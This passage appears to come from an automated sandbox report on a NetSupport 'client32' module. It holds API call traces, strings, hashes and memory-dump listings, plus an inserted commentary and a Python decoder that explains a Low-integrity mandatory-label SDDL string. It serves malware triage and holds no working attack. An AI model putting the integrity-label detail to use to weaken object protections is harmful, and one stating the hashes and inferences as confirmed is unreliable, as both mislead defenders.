                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Sleep
                                                        • String ID: /weblock.htm$:%u$redirect:http://127.0.0.1
                                                        • API String ID: 3472027048-2181447511
                                                        • Opcode ID: 6a60cb9f04780bf1a4e56164c16ea68f90256d0685b113d35d93a91b141b9392
                                                        • Instruction ID: 163816d6f2ef246cfcbc0681839aaf7e4393b709d4332236b9ae6e4fd5f74bc1
                                                        • Opcode Fuzzy Hash: 6a60cb9f04780bf1a4e56164c16ea68f90256d0685b113d35d93a91b141b9392
                                                        • Instruction Fuzzy Hash: 4E110876E01116ABFB10DB64DC51FBEB7A99B5270CF0441E9EC0D97280DE607E048BE1
                                                        APIs
                                                        • GetSystemMetrics.USER32(00000000), ref: 110ED100
                                                        • GetSystemMetrics.USER32(0000004C), ref: 110ED123
                                                        • GetSystemMetrics.USER32(0000004D), ref: 110ED12A
                                                        • GetSystemMetrics.USER32(00000001), ref: 110ED131
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MetricsSystem
                                                        • String ID:
                                                        • API String ID: 4116985748-0
                                                        APIs
                                                          • Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
                                                          • Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
                                                          • Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7
                                                        • CreateWindowExA.USER32(00000000,edit,00000000,40040004,?,?,?,?,?,00000002,00000000,?), ref: 11007327
                                                        • SetFocus.USER32(?), ref: 11007383
                                                        Strings
                                                        Similarity
                                                        • API ID: CreateFocusWindow_malloc_memsetwsprintf
                                                        • String ID: edit
                                                        • API String ID: 1305092643-2167791130
                                                        APIs
                                                        • std::_Xinvalid_argument.LIBCPMT ref: 11009265
                                                        • _memmove.LIBCMT ref: 110092B6
                                                          • Part of subcall function 11008D50: std::_Xinvalid_argument.LIBCPMT ref: 11008D6A
                                                        Strings
                                                        Similarity
                                                        • API ID: Xinvalid_argumentstd::_$_memmove
                                                        • String ID: string too long
                                                        • API String ID: 2168136238-2556327735
                                                        APIs
                                                        • _strtok.LIBCMT ref: 1103734C
                                                          • Part of subcall function 11151A96: __getptd.LIBCMT ref: 11151AB4
                                                        • _strtok.LIBCMT ref: 1103741C
                                                        Strings
                                                        Similarity
                                                        • API ID: _strtok$__getptd
                                                        • String ID: ; >
                                                        • API String ID: 715173073-2207967850
                                                        APIs
                                                          • Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
                                                          • Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
                                                          • Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7
                                                        • std::exception::exception.LIBCMT ref: 110F9259
                                                        • __CxxThrowException@8.LIBCMT ref: 110F926E
                                                        Strings
                                                        Similarity
                                                        • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                        • String ID: SERVICE_STOPPED
                                                        • API String ID: 1338273076-2952185856
                                                        APIs
                                                        • std::_Xinvalid_argument.LIBCPMT ref: 1100F22B
                                                          • Part of subcall function 1114EE63: std::exception::exception.LIBCMT ref: 1114EE78
                                                          • Part of subcall function 1114EE63: __CxxThrowException@8.LIBCMT ref: 1114EE8D
                                                          • Part of subcall function 1114EE63: std::exception::exception.LIBCMT ref: 1114EE9E
                                                        • std::_Xinvalid_argument.LIBCPMT ref: 1100F242
                                                        Strings
                                                        Similarity
                                                        • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                        • String ID: string too long
                                                        • API String ID: 963545896-2556327735
                                                        APIs
                                                          • Part of subcall function 11008D50: std::_Xinvalid_argument.LIBCPMT ref: 11008D6A
                                                        • OutputDebugStringA.KERNEL32(111D8BD0,000000FF,NsAppSystem::CNsAsException::CNsAsException,0000002B,111D8BD0,00000000,000000FF,82E0FB89,?,00000000,00000000,?,?,?,00000000,111761AB), ref: 110D5663
                                                        • OutputDebugStringA.KERNEL32(1118BEE8,?,?,?,00000000,111761AB,000000FF,?,110D2C63,?,Invalid Server paramters), ref: 110D566A
                                                        Strings
                                                        • NsAppSystem::CNsAsException::CNsAsException, xrefs: 110D560D
                                                        Similarity
                                                        • API ID: DebugOutputString$Xinvalid_argumentstd::_
                                                        • String ID: NsAppSystem::CNsAsException::CNsAsException
                                                        • API String ID: 3978508687-500537696
                                                        APIs
                                                        Strings
                                                        Similarity
                                                        • API ID: _strncpy
                                                        • String ID: ..\ctl32\util.cpp$p || !"<2Kb mem"
                                                        • API String ID: 2961919466-1642919599
                                                        APIs
                                                        • std::_Xinvalid_argument.LIBCPMT ref: 1108F095
                                                          • Part of subcall function 1114EE63: std::exception::exception.LIBCMT ref: 1114EE78
                                                          • Part of subcall function 1114EE63: __CxxThrowException@8.LIBCMT ref: 1114EE8D
                                                          • Part of subcall function 1114EE63: std::exception::exception.LIBCMT ref: 1114EE9E
                                                        • _memmove.LIBCMT ref: 1108F0C4
                                                        Strings
                                                        Similarity
                                                        • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                        • String ID: vector<T> too long
                                                        • API String ID: 1785806476-3788999226
                                                        • Opcode ID: 6f0b2e1c205bbd2c96d839bee56b005472a4b14bbc734a29f06d1c48f80613f6
                                                        • Instruction ID: a6d9f17f4f5abecd3a3e42e3327a60068f9e3e230c18d666d12c29c30de67088
                                                        • Opcode Fuzzy Hash: 6f0b2e1c205bbd2c96d839bee56b005472a4b14bbc734a29f06d1c48f80613f6
                                                        • Instruction Fuzzy Hash: 6001B5B5E042069FC734CEB9DC80CA7B7D9EBD4318714CA2DE55A87644EA70F801CBA1
                                                        Strings
                                                        • Error. NULL capbuf, xrefs: 1100B571
                                                        • Error. preventing capbuf overflow, xrefs: 1100B596
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Error. NULL capbuf$Error. preventing capbuf overflow
                                                        • API String ID: 0-3856134272
                                                        • Opcode ID: b51532faca43ebac7e18a9a5a26819066dfd90f60a6994718c66c64743f8ecf5
                                                        • Instruction ID: 418a5b702e0b0712c65a1007775ff8f326adea187fe23ba1f0a502aa42cbf0d9
                                                        • Opcode Fuzzy Hash: b51532faca43ebac7e18a9a5a26819066dfd90f60a6994718c66c64743f8ecf5
                                                        • Instruction Fuzzy Hash: 5901DBBAE00A0597D610CF55F840ACBB398DBC037DF04897AEA1E97201D531F59187E2
                                                        APIs
                                                          • Part of subcall function 11102BC0: GetCurrentThreadId.KERNEL32 ref: 11102BCE
                                                          • Part of subcall function 11102BC0: EnterCriticalSection.KERNEL32(00000000,75A33760,00000000,111DBD28,?,110C3135,00000000,75A33760), ref: 11102BD8
                                                          • Part of subcall function 11102BC0: LeaveCriticalSection.KERNEL32(00000000,75A4A1D0,00000000,?,110C3135,00000000,75A33760), ref: 11102BF8
                                                        • InterlockedIncrement.KERNEL32(00000000), ref: 110831C1
                                                          • Part of subcall function 11103060: GetCurrentThreadId.KERNEL32 ref: 11103089
                                                          • Part of subcall function 11103060: EnterCriticalSection.KERNEL32(00000000,?,1106B5D7,00000001,?), ref: 11103096
                                                          • Part of subcall function 11103060: LeaveCriticalSection.KERNEL32(00000000,?,?,?,1106B5D7), ref: 111030E2
                                                          • Part of subcall function 11083090: InterlockedDecrement.KERNEL32(00000000), ref: 11083091
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalSection$CurrentEnterInterlockedLeaveThread$DecrementIncrement
                                                        • String ID: ..\ctl32\Errorhan.cpp$tdata
                                                        • API String ID: 572542348-657756363
                                                        • Opcode ID: f4e42414f0fbdbc5b375dfe8d0a8774ab02788612ae6362accde8ab73a6fb4c6
                                                        • Instruction ID: fed0740ed2e363c3bace71a798bb0b99693e64dd8fd0b9732b9dedd91c868084
                                                        • Opcode Fuzzy Hash: f4e42414f0fbdbc5b375dfe8d0a8774ab02788612ae6362accde8ab73a6fb4c6
                                                        • Instruction Fuzzy Hash: 06E0ED3AE0DA3F27D516A6A54C28BCFFB8A1B41A6DB404014F9286F640FC80A80082F6
                                                        APIs
                                                        • GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 11095754
                                                        • SetLastError.KERNEL32(00000078,00000000,?,110965DC,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109577D
                                                        Strings
                                                        • ConvertStringSecurityDescriptorToSecurityDescriptorA, xrefs: 1109574E
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressErrorLastProc
                                                        • String ID: ConvertStringSecurityDescriptorToSecurityDescriptorA
                                                        • API String ID: 199729137-262600717
                                                        • Opcode ID: 7296345c72dc160559074f0e23efd7321d78c34b523c223cec433581c304b291
                                                        • Instruction ID: f0e677052f352e1d491147569a4aaef78e9149aea0f3838322468369201922be
                                                        • Opcode Fuzzy Hash: 7296345c72dc160559074f0e23efd7321d78c34b523c223cec433581c304b291
                                                        • Instruction Fuzzy Hash: 1EF08276A40228AFC320CF94E844E9BB7E8EF48721F00451AF95AD7240D671E910CBB0
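The function record above resolves ConvertStringSecurityDescriptorToSecurityDescriptorA through GetProcAddress at run time, and the stack captured at the SetLastError call carries the SDDL string S:(ML;;NW;;;LW). The first argument to SetLastError, 0x78, is ERROR_CALL_NOT_IMPLEMENTED, which fits a fallback branch taken when the export cannot be resolved; that reading is an inference from the captured arguments, not something the report states. The decoder below is an added example, not code from the report or from the NetSupport client32 module: it parses SDDL strings of this shape (non-conditional ACEs only) and shows that S:(ML;;NW;;;LW) attaches a mandatory label of Low integrity (S-1-16-4096) with the No-Write-Up policy, so that callers at Low integrity or above may write to the object, subject to the DACL. All constants are the documented SDDL aliases; the sample string in the test is the one from the record above.

```python
import re

# Well-known mandatory-level SID aliases (S-1-16-<RID>); the RID is the integrity level.
MANDATORY_LEVEL_ALIASES = {
    "LW": "S-1-16-4096",   # Low
    "ME": "S-1-16-8192",   # Medium
    "MP": "S-1-16-8448",   # Medium Plus
    "HI": "S-1-16-12288",  # High
    "SI": "S-1-16-16384",  # System
}
INTEGRITY_NAMES = {
    0: "Untrusted", 4096: "Low", 8192: "Medium", 8448: "Medium Plus",
    12288: "High", 16384: "System", 20480: "Protected Process",
}
ACE_TYPES = {
    "A": "ACCESS_ALLOWED_ACE", "D": "ACCESS_DENIED_ACE",
    "AU": "SYSTEM_AUDIT_ACE", "ML": "SYSTEM_MANDATORY_LABEL_ACE",
}
# Mandatory label policy tokens and their SYSTEM_MANDATORY_LABEL_* mask bits.
MANDATORY_LABEL_RIGHTS = {
    "NW": ("NO_WRITE_UP", 0x1),
    "NR": ("NO_READ_UP", 0x2),
    "NX": ("NO_EXECUTE_UP", 0x4),
}

SECTION_RE = re.compile(r"(O|G|D|S):")
ACE_RE = re.compile(r"\(([^)]*)\)")   # plain ACEs only; conditional ACEs nest parentheses


def split_sections(sddl):
    """Split 'O:...G:...D:...S:...' into a dict keyed by section tag."""
    out = {}
    tags = [(m.start(), m.group(1)) for m in SECTION_RE.finditer(sddl)]
    for i, (pos, tag) in enumerate(tags):
        end = tags[i + 1][0] if i + 1 < len(tags) else len(sddl)
        out[tag] = sddl[pos + 2:end]
    return out


def parse_ace(ace):
    """Parse one ACE string 'type;flags;rights;object_guid;inherit_guid;sid'."""
    fields = ace.split(";")
    if len(fields) != 6:
        raise ValueError(f"malformed ACE string: ({ace})")
    ace_type, ace_flags, rights, _obj_guid, _inh_guid, sid = fields
    sid = MANDATORY_LEVEL_ALIASES.get(sid, sid)
    entry = {"type": ACE_TYPES.get(ace_type, ace_type), "flags": ace_flags,
             "rights_raw": rights, "sid": sid}
    if ace_type == "ML":
        # The rights field of a label ACE is a run of two-letter policy tokens.
        tokens = [rights[i:i + 2] for i in range(0, len(rights), 2)]
        unknown = [t for t in tokens if t not in MANDATORY_LABEL_RIGHTS]
        if unknown:
            raise ValueError(f"unknown mandatory label policy token(s): {unknown}")
        entry["policy"] = [MANDATORY_LABEL_RIGHTS[t][0] for t in tokens]
        entry["policy_mask"] = sum(MANDATORY_LABEL_RIGHTS[t][1] for t in tokens)
        rid = int(sid.rsplit("-", 1)[1]) if sid.startswith("S-1-16-") else None
        entry["integrity_level"] = INTEGRITY_NAMES.get(rid, f"RID {rid}")
    return entry


def decode_sddl(sddl):
    """Decode owner, group, DACL and SACL of an SDDL string into plain dicts."""
    sections = split_sections(sddl)
    result = {"owner": sections.get("O"), "group": sections.get("G")}
    for tag, name in (("D", "dacl"), ("S", "sacl")):
        body = sections.get(tag)
        if body is None:
            result[name] = None
            continue
        first = body.find("(")
        acl_flags = body if first < 0 else body[:first]   # e.g. 'P', 'AI', 'AR'
        result[name] = {"flags": acl_flags,
                        "aces": [parse_ace(a) for a in ACE_RE.findall(body)]}
    return result


def explain_label(sddl):
    """One-line triage reading of the mandatory label ACE, if the SACL carries one."""
    sacl = decode_sddl(sddl).get("sacl")
    labels = [a for a in (sacl["aces"] if sacl else [])
              if a["type"] == "SYSTEM_MANDATORY_LABEL_ACE"]
    if not labels:
        return ("no mandatory label: the object inherits the creator's integrity level "
                "(Medium for an ordinary user process)")
    a = labels[0]
    return (f"mandatory label {a['integrity_level']} ({a['sid']}), policy "
            f"{'|'.join(a['policy'])}: callers at {a['integrity_level']} integrity or "
            f"above pass the label check; lower-integrity callers are blocked by it")


if __name__ == "__main__":
    # The SDDL string captured on the stack in the record above.
    print(explain_label("S:(ML;;NW;;;LW)"))
```

The decoder stops at the label check on purpose: whether a Low-integrity caller actually gets write access is then decided by the DACL, which this string does not set, so the object's DACL must be read from the creating call (or from a live handle) to finish the assessment.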
                                                        APIs
                                                        • SendDlgItemMessageA.USER32(?,?,?,?,?), ref: 110010B7
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        • e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 11001091
                                                        • m_hWnd, xrefs: 11001096
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Message$ErrorExitItemLastProcessSendwsprintf
                                                        • String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                        • API String ID: 2046328329-1557312927
                                                        • Opcode ID: 7af6d590896ff1dfbcac7f380829b7aab34670307aa9b842ebd1b5702f891b1a
                                                        • Instruction ID: 959fc845a7b13bf9de0acd13928d7ecdd6b58ad8c2d11ea6b61d336c87b12d71
                                                        • Opcode Fuzzy Hash: 7af6d590896ff1dfbcac7f380829b7aab34670307aa9b842ebd1b5702f891b1a
                                                        • Instruction Fuzzy Hash: A8E01AB6610219BFD314CE85EC40ED7B3ADEB48354F008519F95997240D6B0E850CBB1
                                                        APIs
                                                        • SendMessageA.USER32(?,?,?,?), ref: 11001073
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        • e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 11001051
                                                        • m_hWnd, xrefs: 11001056
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                        • String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                        • API String ID: 819365019-1557312927
                                                        • Opcode ID: 563ac9448ad9209c405835ae6ffe744044af7d71d485e160b5cdb4f271289dda
                                                        • Instruction ID: 4a608db799e5a9afbdf3b9bc31dfafed9475bd885bd203aecf675f076c5a0dbd
                                                        • Opcode Fuzzy Hash: 563ac9448ad9209c405835ae6ffe744044af7d71d485e160b5cdb4f271289dda
                                                        • Instruction Fuzzy Hash: 90E046B6A00219BFD210CE85DC85EDAB3ACFB58324F00C429F91987240D6B0E850CBA1
                                                        APIs
                                                        • PostMessageA.USER32(?,?,?,?), ref: 11001103
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        • e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 110010E1
                                                        • m_hWnd, xrefs: 110010E6
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Message$ErrorExitLastPostProcesswsprintf
                                                        • String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                        • API String ID: 906220102-1557312927
                                                        • Opcode ID: 49ceb5e28b7757a3c3378fb78ae6eab82e85225ab6ba3376b7b480bd37d390ef
                                                        • Instruction ID: b9cf230d2c9f3a88a66f013921ab9639df1a4187879fb0e609e6af44bdfe2f68
                                                        • Opcode Fuzzy Hash: 49ceb5e28b7757a3c3378fb78ae6eab82e85225ab6ba3376b7b480bd37d390ef
                                                        • Instruction Fuzzy Hash: 3DE04F76A00219BFD215CE45DC45ED6B3ACFB48314F00C429F91487640D6B0F850CBA1
                                                        APIs
                                                        • KillTimer.USER32(?,?), ref: 110153DB
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        • e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 110153C1
                                                        • m_hWnd, xrefs: 110153C6
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
